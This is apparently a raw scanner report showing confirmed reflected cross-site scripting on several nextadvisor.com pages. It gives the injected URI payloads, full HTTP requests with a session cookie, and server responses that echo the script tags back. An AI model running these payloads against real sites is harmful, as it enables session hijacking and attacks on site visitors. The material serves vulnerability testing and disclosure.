<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title>Online Reviews</title><meta name="description" content="Compare services at NextAdvisor.com to help you choose the best service for your needs."/><meta name="keywords" content="NextAdvisor, NextAdvisor.com, Next Advisor, NextAdviser, Next Adviser, ConsumerCompare, ConsumerCompare.org, voip, credit reports, identity theft, online education, dvd rental, diet, internet phone service, credit scores, id theft, online schools, movie rental, online diet programs, Vonage, Voip.com, Equifax, CreditCheck Total, FreeCreditreport.com, Identity Guard, LifeLock, TrustedID, LoudSiren, PrivacyMatters, University of Phoenix, Capella University, AIU, eDiets, South Beach Diet, Blockbuster, Netflix, Cinemanow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/aboutus.php'"--></style></script><script>netsparker(0x0003B9)</script>" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) 
}catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option 
value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0003B9)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="script%3E" class='link_off'>About Us</a> <span class="nav_border">|</span> <a href="management.php">Management</a> <span class="nav_border">|</span> <a href="pressroom.php">Press</a><span class="nav_border">|</span><a href="/affiliate_program.php">Affiliate Program</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" 
name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--> <div id="content" > <h1 style="padding-top:12px;">File Not Found</h1> <p class="welcome"> We're sorry, the file you requested could not be found. </p> <div style="clear:both" ></div> <!--Start Footer--> <div id="footer"></div> <div class="footer_content"> <div class="footer_left"> <h3>All Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p> <a href="/audiobooks/">Audio Books</a><br /> <a href="/auto_insurance/">Auto Insurance</a><br /> <a href="/credit_cards/">Credit Cards</a><br /> <a href="/credit_report_monitoring/">Credit Monitoring</a><br /> <a href="/diet_services/">Diet Programs</a><br /> <a href="/online_dvd_rental_services/">DVD Rental</a></p></td> <td><p> <a href="/genealogy/">Genealogy</a><br /> <a href="/identity_theft_protection_services/">Identity Theft</a><br /> <a href="/internet_fax/">Internet Fax</a><br /> <a href="/online_backup_services/">Online Backup</a><br /> <a href="/online_college/">Online College</a><br/> <a href="/online_dating/">Online Dating</a></p></td> <td><p> <a href="/online_meeting/">Online Meeting</a><br /> <a href="/parental_controls/">Parental Controls</a><br /> <a href="/payday_loans/">Payday Loans</a><br /> <a href="/people_search/">People Search</a><br /> <a href="/remote_desktop/">Remote Desktop</a><br /> <a href="/savings_accounts/">Savings Accounts</a> </p></td> <td><p> <a href="/internet_security_software/">Security Software</a><br /> <a href="/online_tax_preparation_services/">Tax Preparation</a><br /> <a href="/virtual_phone/">Virtual Phone</a><br /> <a href="/voip_services/">VoIP Services</a><br /> <a href="/web_hosting/">Web Hosting</a></p></td> 
</tr></table> </div> <div class="footer_right"><h3>Popular Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p><a href="/credit_report_monitoring/">Credit Monitoring Services</a><br /> <a href="/identity_theft_protection_services/">Identity Theft Services</a><br /> <a href="/web_hosting/">Web Hosting Services</a></p></td> <td><p><a href="/online_dating/">Online Dating Services</a><br /> <a href="/diet_services/">Online Diet Programs</a><br /> <a href="/voip_services/">VoIP Services</a></p></td> </tr> </table><div class="next_latest"><p><a href="/">NextAdvisor Home</a> <span>|</span><a href="/blog/">Latest Blog Headlines</a></p></div> </div> <br style="clear:both" /> </div> <!--End Footer Category--> <!--Start Bottom--> <div id="bottom"> <div id="logo_sml"> <div style="float:left;"><a href="/"><img src="/images/nextadvisor1_sml.gif" alt="" width="116" height="15" /></a><span class="bottomlink"><a href="/aboutus.php">About Us</a></span><span class="bottomlink"><a href="/blog">Blog</a></span><span class="bottomlink"><a href="/contactus.php">Contact Us</a></span><span class="bottomlink"><a href="/privacy.php">Terms &amp; Privacy Policy</a></span><span class="bottomlink"><a href="/affiliate_program.php">Affiliate Program</a></span><span class="bottomlink"><a href="/sitemap.php">Site Map</a></span><span class="bottomlink"><a href="http://twitter.com/nextadvisor" target="_blank">Follow Us On Twitter</a></span></div><div style="margin:3px 0 0 0; float:left"><a href="http://twitter.com/nextadvisor" target="_blank" style="text-decoration:none;"><img src="/images/twitter.gif" /></a></div><br style="clear:both"/> <!--End Bottom--> <p class="copyright">Copyright&#169; 2006 - 2011 NextAdvisor.com - All rights reserved.</p> </div> <!-- /logo_sml --> </div> <!-- /bottom --> <!--End Footer--> </div> <!--End Content--> <br style="clear:both" /> </div><!--End Content Container--></div><!--End Container--><script 
type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-246595-2");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /payday_loans_tx/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003BA)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003BA)%3C/script%3E

/payday_loans_tx/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003BA)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003BA)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/payday_loans_tx/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0003BA)</script>

Request

GET /payday_loans_tx/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003BA)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/payday_loans_tx/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:59:44 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6772
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", payday lender, loans, united states, CashNet USA, Cash Central, PayDayOne, Speedy Cash, Check 'n Go, MyPayDayLoan, PayDayMax" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/payday_loans_tx/'"--></style></script><script>netsparker(0x0003BA)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div 
id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> 
</form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0003BA)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 
'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/payday_loans_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Payday Loan Reviews FAQ</h1> <p>Frequently Asked Questions about Payday Loan Reviews</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Payday Loan Reviews:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the 
question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="payday_loans_tx"> <input type="hidden" name="FieldData4" 
value=".."> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=..
- /contactus.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003DA)%3C/script%3E

/contactus.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003DA)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/contactus.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003DA..

Parameters

Parameter    Type       Value
URI-BASED    Raw URI    '"--></style></script><script>alert(0x0003DA)</script>

Request

GET /contactus.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003DA)%3C/script%3E HTTP/1.1
Referer: http://www.nextadvisor.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:59:49 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3530
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title>Online Reviews</title><meta name="description" content="Compare services at NextAdvisor.com to help you choose the best service for your needs."/><meta name="keywords" content="NextAdvisor, NextAdvisor.com, Next Advisor, NextAdviser, Next Adviser, ConsumerCompare, ConsumerCompare.org, voip, credit reports, identity theft, online education, dvd rental, diet, internet phone service, credit scores, id theft, online schools, movie rental, online diet programs, Vonage, Voip.com, Equifax, CreditCheck Total, FreeCreditreport.com, Identity Guard, LifeLock, TrustedID, LoudSiren, PrivacyMatters, University of Phoenix, Capella University, AIU, eDiets, South Beach Diet, Blockbuster, Netflix, Cinemanow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/contactus.php'"--></style></script><script>netsparker(0x0003DA)</script>" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) 
}catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option 
value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0003DA)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="aboutus.php">About Us</a> <span class="nav_border">|</span> <a href="management.php">Management</a> <span class="nav_border">|</span> <a href="pressroom.php">Press</a><span class="nav_border">|</span><a href="/affiliate_program.php">Affiliate Program</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" 
value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--> <div id="content" > <h1 style="padding-top:12px;">File Not Found</h1> <p class="welcome"> We're sorry, the file you requested could not be found. </p> <div style="clear:both" ></div> <!--Start Footer--> <div id="footer"></div> <div class="footer_content"> <div class="footer_left"> <h3>All Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p> <a href="/audiobooks/">Audio Books</a><br /> <a href="/auto_insurance/">Auto Insurance</a><br /> <a href="/credit_cards/">Credit Cards</a><br /> <a href="/credit_report_monitoring/">Credit Monitoring</a><br /> <a href="/diet_services/">Diet Programs</a><br /> <a href="/online_dvd_rental_services/">DVD Rental</a></p></td> <td><p> <a href="/genealogy/">Genealogy</a><br /> <a href="/identity_theft_protection_services/">Identity Theft</a><br /> <a href="/internet_fax/">Internet Fax</a><br /> <a href="/online_backup_services/">Online Backup</a><br /> <a href="/online_college/">Online College</a><br/> <a href="/online_dating/">Online Dating</a></p></td> <td><p> <a href="/online_meeting/">Online Meeting</a><br /> <a href="/parental_controls/">Parental Controls</a><br /> <a href="/payday_loans/">Payday Loans</a><br /> <a href="/people_search/">People Search</a><br /> <a href="/remote_desktop/">Remote Desktop</a><br /> <a href="/savings_accounts/">Savings Accounts</a> </p></td> <td><p> <a href="/internet_security_software/">Security Software</a><br /> <a href="/online_tax_preparation_services/">Tax Preparation</a><br /> <a href="/virtual_phone/">Virtual Phone</a><br /> <a href="/voip_services/">VoIP Services</a><br /> <a href="/web_hosting/">Web Hosting</a></p></td> </tr></table> 
</div> <div class="footer_right"><h3>Popular Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p><a href="/credit_report_monitoring/">Credit Monitoring Services</a><br /> <a href="/identity_theft_protection_services/">Identity Theft Services</a><br /> <a href="/web_hosting/">Web Hosting Services</a></p></td> <td><p><a href="/online_dating/">Online Dating Services</a><br /> <a href="/diet_services/">Online Diet Programs</a><br /> <a href="/voip_services/">VoIP Services</a></p></td> </tr> </table><div class="next_latest"><p><a href="/">NextAdvisor Home</a> <span>|</span><a href="/blog/">Latest Blog Headlines</a></p></div> </div> <br style="clear:both" /> </div> <!--End Footer Category--> <!--Start Bottom--> <div id="bottom"> <div id="logo_sml"> <div style="float:left;"><a href="/"><img src="/images/nextadvisor1_sml.gif" alt="" width="116" height="15" /></a><span class="bottomlink"><a href="/aboutus.php">About Us</a></span><span class="bottomlink"><a href="/blog">Blog</a></span><span class="bottomlink"><a href="/contactus.php">Contact Us</a></span><span class="bottomlink"><a href="/privacy.php">Terms &amp; Privacy Policy</a></span><span class="bottomlink"><a href="/affiliate_program.php">Affiliate Program</a></span><span class="bottomlink"><a href="/sitemap.php">Site Map</a></span><span class="bottomlink"><a href="http://twitter.com/nextadvisor" target="_blank">Follow Us On Twitter</a></span></div><div style="margin:3px 0 0 0; float:left"><a href="http://twitter.com/nextadvisor" target="_blank" style="text-decoration:none;"><img src="/images/twitter.gif" /></a></div><br style="clear:both"/> <!--End Bottom--> <p class="copyright">Copyright&#169; 2006 - 2011 NextAdvisor.com - All rights reserved.</p> </div> <!-- /logo_sml --> </div> <!-- /bottom --> <!--End Footer--> </div> <!--End Content--> <br style="clear:both" /> </div><!--End Content Container--></div><!--End Container--><script type="text/javascript">var gaJsHost = 
(("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-246595-2");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /privacy.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003DC)%3C/script%3E

/privacy.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003DC)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/privacy.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003DC)%..

Parameters

Parameter    Type       Value
URI-BASED    Raw URI    '"--></style></script><script>alert(0x0003DC)</script>

Request

GET /privacy.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003DC)%3C/script%3E HTTP/1.1
Referer: http://www.nextadvisor.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
